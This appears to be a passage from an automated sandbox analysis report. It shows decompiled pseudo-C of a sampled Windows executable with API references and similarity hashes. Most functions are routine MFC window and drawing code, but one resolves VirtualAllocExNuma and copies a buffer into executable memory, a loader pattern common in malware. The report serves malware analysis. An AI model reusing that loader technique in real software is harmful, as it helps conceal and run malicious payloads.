					_v44.cbClsExtra = 0;
					_v44.lpszMenuName = 0;
					_v44.hIcon = _a16;
					_push( &_v44);
					_v44.hInstance = _t40;
					_v44.hCursor = _t37;
					_v44.hbrBackground = _a12;
					_v44.lpszClassName = _t42;
					_t34 = E004142C3();
					_t50 = _t34;
					if(_t34 == 0) {
						E0041A6C8(_t50);
					}
				}
				return _t42;
			}

APIs

wsprintfA.USER32 ref: 0041439A
wsprintfA.USER32 ref: 004143B6
GetClassInfoA.USER32 ref: 004143C5

Strings

Afx:%x:%x:%x:%x:%x, xrefs: 004143B0
Afx:%x:%x, xrefs: 00414394

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: wsprintf$ClassInfo
String ID: Afx:%x:%x$Afx:%x:%x:%x:%x:%x
API String ID: 845911565-79760390
Opcode ID: e4d80fe6cbb09f3bee196ac69818de1da45527346801286afda017feaf06373e
Instruction ID: 0a19c2bbf351d913602cecefe87ed30b20bbc7f16e3ca44516e66fb3e2e9fa80
Opcode Fuzzy Hash: e4d80fe6cbb09f3bee196ac69818de1da45527346801286afda017feaf06373e
Instruction Fuzzy Hash: B3214271A0021DAF8F11EF95DC809DF7BB8EF48354B54402BF914E3251D3749A91CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00411BB7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411BB7(void* __ecx, void* __eflags, struct HWND__** _a4) {
				void* _t10;
				void* _t11;
				struct HWND__* _t13;
				struct HWND__* _t16;
				struct HWND__** _t23;
				void* _t24;

				_t23 = _a4;
				_t24 = __ecx;
				if(E00414007(__ecx, _t23) != 0) {
					L12:
					_t10 = 1;
					return _t10;
				}
				_t11 = E00414DCC(__ecx);
				if(_t11 == 0 ||  *((intOrPtr*)(_t11 + 0x50)) == 0) {
					if(_t23[1] != 0x100) {
						L13:
						return E00415EEB(_t23);
					}
					_t13 = _t23[2];
					if(_t13 == 0x1b || _t13 == 3) {
						if((GetWindowLongA( *_t23, 0xfffffff0) & 0x00000004) == 0 || E0041A7A3( *_t23, ?str?) == 0) {
							goto L13;
						} else {
							_t16 = GetDlgItem( *(_t24 + 0x1c), 2);
							if(_t16 == 0 || IsWindowEnabled(_t16) != 0) {
								SendMessageA( *(_t24 + 0x1c), 0x111, 2, 0);
								goto L12;
							} else {
								goto L13;
							}
						}
					} else {
						goto L13;
					}
				} else {
					return 0;
				}
			}

APIs

GetWindowLongA.USER32 ref: 00411BF8
GetDlgItem.USER32 ref: 00411C17
IsWindowEnabled.USER32(00000000), ref: 00411C22
SendMessageA.USER32(?,00000111,00000002,00000000), ref: 00411C38

Strings

Edit, xrefs: 00411C02

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$EnabledItemLongMessageSend
String ID: Edit
API String ID: 3499652902-554135844
Opcode ID: d2bf7d8cbc67d805becf9f5c6b39b18b476eb93c12fd4936ba7e19a4eada64a8
Instruction ID: 51c9d298f70c0f27378d29b3ac4567bc27d580c5dbc93a390a738e7f39d54beb
Opcode Fuzzy Hash: d2bf7d8cbc67d805becf9f5c6b39b18b476eb93c12fd4936ba7e19a4eada64a8
Instruction Fuzzy Hash: F701A1303486116AEA341B26DD09BEBA764DB80755F14442BF601D56F4EB68D9C2869C

Uniqueness

Uniqueness Score: -1.00%

Function 004012BE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E004012BE(intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__** _t11;

				_v12 = 0;
				_v8 = 0;
				_t11 =  &_v8;
				_push(_t11);
				_push("kernel32.dll");
				_push(0);
				L0040C36A();
				if(_t11 != 0) {
					 *0x437ca8 = GetProcAddress(_v8, "VirtualAllocExNuma");
					_v12 =  *0x437ca8(GetCurrentProcess(), 0, _a8, 0x3000, 0x40, 0);
					E00405700(_v12, _a4, _a8);
				}
				return _v12;
			}

0x004012c4
0x004012cb
0x004012d2
0x004012d5
0x004012d6
0x004012db
0x004012dd
0x004012e4
0x004012f5
0x00401316
0x00401325
0x0040132a
0x00401333

APIs

GetModuleHandleExA.KERNEL32(00000000,kernel32.dll,00000000), ref: 004012DD
GetProcAddress.KERNEL32(00000000,VirtualAllocExNuma), ref: 004012EF
GetCurrentProcess.KERNEL32(00000000,00000000,00003000,00000040,00000000), ref: 00401309

Strings

VirtualAllocExNuma, xrefs: 004012E6
kernel32.dll, xrefs: 004012D6

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: VirtualAllocExNuma$kernel32.dll
API String ID: 4190356694-3151700105
Opcode ID: 4d1cfc9253b6b5733faca174fa102fb281a72f41be6bcaf77d063d5ced50d19a
Instruction ID: ab771110a78a71b3a50b1cedd4e9fcdb71e2ffac9dc1a6c26221fcdacf48f8c9
Opcode Fuzzy Hash: 4d1cfc9253b6b5733faca174fa102fb281a72f41be6bcaf77d063d5ced50d19a
Instruction Fuzzy Hash: C90136B5A40308BFDB10DFE4DC45F9E7BB8EB48715F509165FA04A72C0D7749A409BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2AB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041A2AB(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}

0x0041a2ad
0x0041a2b4
0x0041a2c0
0x0041a2c2
0x0041a2ca
0x0041a2dd
0x0041a2e1
0x0041a2e4
0x0041a2e4
0x0041a2cc
0x0041a2d5
0x0041a2d5
0x0041a2ee

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,0041F6C9,00000000), ref: 0041A2B4
GetProcAddress.KERNEL32(00000000,SetLayout), ref: 0041A2C2
SetLastError.KERNEL32(00000078,?,?,0041F6C9,00000000), ref: 0041A2E4

Strings

GDI32.DLL, xrefs: 0041A2AF
SetLayout, xrefs: 0041A2BA

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$SetLayout
API String ID: 4275029093-2147214759
Opcode ID: d183b8fac5a71e79e7e75f7f8f27896d7713d41af84b50f8206dd60643ccb5a3
Instruction ID: 1037135d2ca6d5ab5d4448aeed59ef973abf2fe16e9a43a6574f43dcbb056aca
Opcode Fuzzy Hash: d183b8fac5a71e79e7e75f7f8f27896d7713d41af84b50f8206dd60643ccb5a3
Instruction Fuzzy Hash: D1E0D832701210FB82215719AC0895FBB52DBD4736BA98567F529C1290C7B9489286AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041A275, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041A275(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}

0x0041a276
0x0041a289
0x0041a291
0x0041a29e
0x0041a2a1
0x0041a293
0x0041a298
0x0041a298
0x0041a2aa

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,0041F6BC), ref: 0041A27D
GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0041A289
SetLastError.KERNEL32(00000078), ref: 0041A2A1

Strings

GDI32.DLL, xrefs: 0041A278
GetLayout, xrefs: 0041A283

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$GetLayout
API String ID: 4275029093-2396518106
Opcode ID: 9c85741f7edf57603d2f5ee7905b819242f56eff0a883d68a4b20df1af663ec8
Instruction ID: 1954eb6f5355677032b0495d8726e370a05d23e30929425976ce774bf1de63f4
Opcode Fuzzy Hash: 9c85741f7edf57603d2f5ee7905b819242f56eff0a883d68a4b20df1af663ec8
Instruction Fuzzy Hash: 38D05B31B42330EFC66027A4BD0D69A7B54DB08B6579502B7782ED22D0CBF85C4187ED

Uniqueness

Uniqueness Score: -1.00%

Function 0041F691, Relevance: 7.8, APIs: 5, Instructions: 339
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E0041F691(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				long _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				intOrPtr _t150;
				intOrPtr* _t155;
				intOrPtr _t161;
				void* _t162;
				signed int _t165;
				signed int _t167;
				signed int _t171;
				signed int _t173;
				long _t191;
				intOrPtr* _t198;
				intOrPtr* _t200;
				long _t202;
				intOrPtr* _t209;
				intOrPtr* _t211;
				intOrPtr* _t214;
				long _t216;
				void* _t219;
				signed char _t222;
				intOrPtr _t225;
				intOrPtr _t236;
				intOrPtr _t242;
				char* _t248;
				struct tagRECT* _t263;
				intOrPtr* _t279;
				signed int _t281;
				long _t283;
				void* _t287;
				intOrPtr _t291;
				intOrPtr _t308;

				_t219 = __ecx;
				 *((intOrPtr*)(__ecx + 0x88)) = 1;
				E0041FF70(__ecx);
				_t279 = __ecx + 0x84;
				if((E0041A275( *((intOrPtr*)(__ecx + 0x84))) & 0x00000001) != 0) {
					E0041A2AB( *_t279, 0);
				}
				_t150 =  *((intOrPtr*)(_t219 + 0x68));
				_t222 =  *(_t150 + 0x64);
				if((_t222 & 0x00000004) == 0) {
					if((_t222 & 0x00000002) == 0) {
						GetWindowRect( *(_t150 + 0x1c),  &_v44);
						_t281 =  *(_t219 + 0x78) & 0x0000a000;
						 *((intOrPtr*)(_t219 + 4)) = _a4;
						asm("sbb edx, edx");
						 *((intOrPtr*)(_t219 + 8)) = _a8;
						_t248 =  &_v20;
						_t155 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))(_t248, 0xffffffff, ( ~_t281 & 0x00000006) + 0xa);
						_t225 =  *_t155;
						_v8 =  *((intOrPtr*)(_t155 + 4));
						if(_t281 == 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t283 = _v44.left;
							asm("cdq");
							_v20 = _t225 + _t283;
							_v28 = _t283;
							_t250 = _v44.right - _t283 - _t248 >> 1;
							_t161 = _a8 - (_v44.right - _t283 - _t248 >> 1);
							_v24 = _t161;
							_v16 = _v8 + _t161;
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t291 = _v44.top;
							_v24 = _t291;
							asm("cdq");
							_t250 = _v44.bottom - _t291 - _t248 >> 1;
							_t191 = _a4 - (_v44.bottom - _t291 - _t248 >> 1);
							_v28 = _t191;
							_v20 = _t225 + _t191;
							_v16 = _v8 + _t291;
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t162 = _t219 + 0x48;
						_push(0);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t287 = 0xc40000;
						_push(0xc40000);
					} else {
						GetWindowRect( *(_t150 + 0x1c),  &_v60);
						 *((intOrPtr*)(_t219 + 4)) = _a4;
						 *((intOrPtr*)(_t219 + 8)) = _a8;
						_t198 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0xa);
						_t200 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0x10);
						_t236 = _v60.top;
						_v44.top = _t236;
						_v44.bottom =  *((intOrPtr*)(_t198 + 4)) + _t236;
						_v16 =  *((intOrPtr*)(_t200 + 4));
						_t202 = _v60.left;
						_v44.right =  *_t198 + _t202;
						_v44.left = _t202;
						_t250 =  *_t200 + _t202;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v44.left = _t202;
						_v44.right =  *_t200 + _t202;
						_v44.top = _t236;
						_v44.bottom = _v16 + _t236;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						goto L6;
					}
				} else {
					GetWindowRect( *(_t150 + 0x1c),  &_v60);
					 *((intOrPtr*)(_t219 + 4)) = _a4;
					 *((intOrPtr*)(_t219 + 8)) = _a8;
					_t209 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0xa);
					_t211 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0x10);
					_v12 =  *_t211;
					_v8 =  *((intOrPtr*)(_t211 + 4));
					_t214 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 6);
					_t242 = _v60.top;
					_v44.top = _t242;
					_v44.bottom =  *((intOrPtr*)(_t209 + 4)) + _t242;
					_v16 =  *((intOrPtr*)(_t214 + 4));
					_t216 = _v60.left;
					_v44.right =  *_t209 + _t216;
					_v44.left = _t216;
					_t250 =  *_t214 + _t216;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.left = _t216;
					_v44.right = _v12 + _t216;
					_v44.top = _t242;
					_v44.bottom = _v8 + _t242;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t308 = _v16 + _t242;
					_v44.left = _t216;
					_v8 = _t308;
					_v44.bottom = _t308;
					_v44.right = _t250;
					_v44.top = _t242;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.left = _t216;
					_v44.right = _t250;
					_v44.top = _t242;
					_v44.bottom = _v8;
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t287 = 0xc40000;
					_push(0);
					_push(0xc40000);
					_t162 = _t219 + 0x48;
				}
				_push(_t162);
				E004239AC();
				_push(0);
				_t263 = _t219 + 0x58;
				_push(_t287);
				_push(_t263);
				E004239AC();
				_t165 =  *0x439bf4; // 0x2
				_t167 =  *0x439bf0; // 0x2
				InflateRect(_t219 + 0x48,  ~_t167,  ~_t165);
				_t171 =  *0x439bf4; // 0x2
				_t173 =  *0x439bf0; // 0x2
				InflateRect(_t263,  ~_t173,  ~_t171);
				_t264 = _a8;
				_t289 = _a4;
				E0041F5D0(_t219 + 0x28, _a4, _a8);
				E0041F5D0(_t219 + 0x38, _a4, _a8);
				E0041F5D0(_t219 + 0x48, _t289, _t264);
				E0041F5D0(_t219 + 0x58, _t289, _t264);
				 *((intOrPtr*)(_t219 + 0x74)) = E004201E2();
				E0041F9E4(_t219, _t289, _t264);
				return E00420341(_t219, _t250);
			}

APIs

Part of subcall function 0041FF70: PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0041FF8D
Part of subcall function 0041FF70: GetMessageA.USER32 ref: 0041FF9B
Part of subcall function 0041FF70: DispatchMessageA.USER32 ref: 0041FFAE
Part of subcall function 0041FF70: SetRectEmpty.USER32(?), ref: 0041FFD7
Part of subcall function 0041FF70: GetDesktopWindow.USER32 ref: 0041FFEF
Part of subcall function 0041FF70: LockWindowUpdate.USER32(?,00000000,?,00000000,0000000F,0000000F,00000000), ref: 00420000
Part of subcall function 0041FF70: GetDCEx.USER32(?,00000000,00000003,?,00000000,0000000F,0000000F,00000000), ref: 00420017

Part of subcall function 0041A275: GetModuleHandleA.KERNEL32(GDI32.DLL,?,0041F6BC), ref: 0041A27D
Part of subcall function 0041A275: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0041A289

GetWindowRect.USER32 ref: 0041F6DF

Part of subcall function 0041A2AB: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,0041F6C9,00000000), ref: 0041A2B4
Part of subcall function 0041A2AB: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 0041A2C2

GetWindowRect.USER32 ref: 0041F7CC

Part of subcall function 0041F5D0: OffsetRect.USER32(?,?,?), ref: 0041F607

Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA0D
Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA17
Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA21
Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA2B

Part of subcall function 00420341: GetCapture.USER32 ref: 00420352
Part of subcall function 00420341: SetCapture.USER32(?), ref: 00420362
Part of subcall function 00420341: GetCapture.USER32 ref: 0042036E
Part of subcall function 00420341: GetMessageA.USER32 ref: 00420388
Part of subcall function 00420341: DispatchMessageA.USER32 ref: 004203BA
Part of subcall function 00420341: GetCapture.USER32 ref: 00420418

GetWindowRect.USER32 ref: 0041F879
InflateRect.USER32(?,00000002,00000002), ref: 0041F97C
InflateRect.USER32(?,00000002,00000002), ref: 0041F98F

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Rect$MessageOffsetWindow$Capture$AddressDispatchHandleInflateModuleProc$DesktopEmptyLockPeekUpdate
String ID:
API String ID: 2041477333-0
Opcode ID: a6936e3c0a7907dd6ed1964909c9b8db90eacfd9e582db4c5833aae79c6c69c9
Instruction ID: 42ddb03621f51a7623203be26b69d0316b25f3a5275469d587ef5c4032a932e9
Opcode Fuzzy Hash: a6936e3c0a7907dd6ed1964909c9b8db90eacfd9e582db4c5833aae79c6c69c9
Instruction Fuzzy Hash: 55D13671A006199FCF04CF98C880ADEBBB6EF49310F1581AAED05BB255D7B1AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004041B5, Relevance: 7.7, APIs: 5, Instructions: 237
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004041B5(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, signed int _a36, signed int _a40) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t131;
				signed int _t230;
				void* _t267;

				if(_a40 < 4) {
					_a40 = 4;
				}
				asm("cdq");
				_v8 = _a28 / _a40 + 1;
				_t131 = _a32;
				asm("cdq");
				_t230 = _t131 % _a40;
				_v12 = _t131 / _a40 + 1;
				_v16 = 0;
				while(1) {
					asm("cdq");
					if(_v16 >= _v12 - _t230 >> 1) {
						break;
					}
					_v20 = 0;
					while(_v20 < _v8 - _v16) {
						BitBlt(_a16, _a20 + _v20 * _a40, _a24 + _v16 * _a40, _a40, _a40, _a4, _a8 + _v20 * _a40, _a12 + _v16 * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
						_t267 = _t267 + 4;
						_v20 = _v20 + 1;
					}
					_v20 = 0;
					while(_v20 < _v12 - _v16) {
						BitBlt(_a16, _a20 + _a28 - (_v16 + 1) * _a40, _a24 + _v20 * _a40, _a40, _a40, _a4, _a8 + _a28 - (_v16 + 1) * _a40, _a12 + _v20 * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
						_t267 = _t267 + 4;
						_v20 = _v20 + 1;
					}
					_v20 = _v8 - _v16;
					while(_v20 >= 0) {
						BitBlt(_a16, _a20 + (_v20 - 1) * _a40, _a24 + _a32 - (_v16 + 1) * _a40, _a40, _a40, _a4, _a8 + (_v20 - 1) * _a40, _a12 + _a32 - (_v16 + 1) * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
						_t267 = _t267 + 4;
						_v20 = _v20 - 1;
					}
					_v20 = _v12 - _v16;
					while(_v20 >= 0) {
						BitBlt(_a16, _a20 + _v16 * _a40, _a24 + (_v20 - 1) * _a40, _a40, _a40, _a4, _a8 + _v16 * _a40, _a12 + (_v20 - 1) * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
						_t267 = _t267 + 4;
						_v20 = _v20 - 1;
					}
					_v16 = _v16 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				return 1;
			}

APIs

BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,00000000,00CC0020), ref: 00404260
BitBlt.GDI32(?,?,?,00000004,00000004,?,?,00000000,00CC0020), ref: 004042E6
BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,?,00CC0020), ref: 0040436F
BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,00000000,00CC0020), ref: 004043EC
BitBlt.GDI32(?,?,?,?,?,?,00000000,?,00CC0020), ref: 00404433

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4852f428c49f7dbf2d34c0264fcda9c88eb02544480e12d11db3c71bda218985
Instruction ID: 29e2845c1fd78097f43836e8b5be001507bced236b49523afccdde5b5024b9e6
Opcode Fuzzy Hash: 4852f428c49f7dbf2d34c0264fcda9c88eb02544480e12d11db3c71bda218985
Instruction Fuzzy Hash: 1EA197B1A001099FCB08CFACC995AEEB7B9FF88308F158659F919A7244D734E915CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0042669F, Relevance: 7.7, APIs: 5, Instructions: 152
stringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0042669F(void* __ecx) {
				intOrPtr _t67;
				void* _t69;
				void* _t72;
				CHAR** _t77;
				intOrPtr _t90;
				signed int _t112;
				void* _t117;
				void* _t129;
				intOrPtr* _t132;
				signed short* _t134;
				intOrPtr* _t135;
				intOrPtr* _t136;
				void* _t137;

				E00406520(E00429D12, _t137);
				_t129 = __ecx;
				if( *((intOrPtr*)(_t137 + 8)) != 0) {
					L20:
					_push(0);
					_push(0x14000c);
					_push(1);
					E0041009E(_t137 - 0x160);
					 *(_t137 - 4) = 2;
					E0041030E(_t137 - 0x160);
					_t65 =  *((intOrPtr*)(_t129 + 0x94));
					if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
						E0041A92B(_t65);
					}
					_t66 =  *((intOrPtr*)(_t129 + 0x98));
					_t132 = _t129 + 0x98;
					if( *((intOrPtr*)(_t129 + 0x98)) != 0) {
						E0041A92B(_t66);
					}
					_t67 =  *((intOrPtr*)(_t137 - 0x104));
					 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t129 + 0x94)) =  *((intOrPtr*)(_t67 + 8));
					 *_t132 =  *((intOrPtr*)(_t67 + 0xc));
					_t117 = _t137 - 0x160;
					L25:
					_t69 = E00411D13(_t117);
					L26:
					 *[fs:0x0] =  *((intOrPtr*)(_t137 - 0xc));
					return _t69;
				}
				_t72 =  *(__ecx + 0x98);
				if(_t72 == 0) {
					goto L20;
				}
				_t69 = GlobalLock(_t72);
				_t134 = _t69;
				if((_t134[3] & 0x00000001) == 0) {
					goto L26;
				}
				_push(0);
				_push(0x14000c);
				_push(1);
				E0041009E(_t137 - 0xbc);
				 *(_t137 - 4) = 0;
				E0041030E(_t137 - 0xbc);
				if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
					_t77 = E00410255(_t137 - 0xbc, _t137 - 0x10);
					 *(_t137 - 4) = 1;
					if(lstrcmpA(_t134 + ( *_t134 & 0x0000ffff),  *_t77) != 0) {
						L10:
						_t112 = 1;
						L11:
						 *(_t137 - 4) =  *(_t137 - 4) & 0x00000000;
						E00416AEC(_t137 - 0x10);
						if(_t112 == 0) {
							_t83 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8));
							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8)) != 0) {
								E0041A92B(_t83);
							}
							_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc));
							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
								E0041A92B(_t85);
							}
						} else {
							_t88 =  *((intOrPtr*)(_t129 + 0x94));
							_t135 = _t129 + 0x94;
							if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
								E0041A92B(_t88);
							}
							E0041A92B( *((intOrPtr*)(_t129 + 0x98)));
							_t90 =  *((intOrPtr*)(_t137 - 0x60));
							 *_t135 =  *((intOrPtr*)(_t90 + 8));
							 *((intOrPtr*)(_t129 + 0x98)) =  *((intOrPtr*)(_t90 + 0xc));
						}
						L19:
						 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
						_t117 = _t137 - 0xbc;
						goto L25;
					}
					 *((char*)(_t137 + 0xb)) = lstrcmpA(_t134 + (_t134[1] & 0x0000ffff),  *(E00410292(_t137 - 0xbc, _t137 - 0x14))) != 0;
					E00416AEC(_t137 - 0x14);
					if( *((char*)(_t137 + 0xb)) != 0) {
						goto L10;
					}
					_t112 = lstrcmpA & 0xffffff00 | lstrcmpA(_t134 + (_t134[2] & 0x0000ffff),  *(E004102D0(_t137 - 0xbc, _t137 - 0x18))) != 0x00000000;
					E00416AEC(_t137 - 0x18);
					if(_t112 == 0) {
						goto L11;
					}
					goto L10;
				}
